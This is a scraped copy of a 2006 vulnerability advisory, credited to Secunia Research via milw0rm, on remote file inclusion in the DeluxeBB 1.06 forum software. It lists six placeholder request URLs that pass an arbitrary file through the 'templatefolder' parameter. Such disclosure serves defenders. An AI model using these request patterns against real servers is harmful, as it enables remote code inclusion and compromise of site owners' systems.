Docstoc

DeluxeBB 1.06 templatefolder Remote File Include Vulnerabilities

Document Sample
DeluxeBB 1.06 templatefolder Remote File Include Vulnerabilities Powered By Docstoc
					                    DeluxeBB 1.06 templatefolder Remote File Include Vulnerabilities   Page 1/1
  1    Secunia Research has discovered some vulnerabilities in DeluxeBB,
  2    which can be exploited by malicious people to conduct SQL injection
  3    attacks and compromise a vulnerable system.
  4
  5    1) Input passed to the "templatefolder" parameter in various scripts
  6    isn’t properly verified, before it is used to include files. This can
  7    be exploited to include arbitrary files from external and local
  8    resources.
  9
  10   Examples:
  11   http://[host]/templates/deluxe/postreply.php?templatefolder=[file]
  12   http://[host]/templates/deluxe/posting.php?templatefolder=[file]
  13   http://[host]/templates/deluxe/pm/newpm.php?templatefolder=[file]
  14   http://[host]/templates/default/postreply.php?templatefolder=[file]
  15   http://[host]/templates/default/posting.php?templatefolder=[file]
  16   http://[host]/templates/default/pm/newpm.php?templatefolder=[file]
  17
  18   # milw0rm.com [2006−06−15]




Andreas Sandblad                                                                       06/15/2006

				
DOCUMENT INFO
Shared By:
Categories:
Stats:
views:34
posted:5/24/2010
language:English
pages:1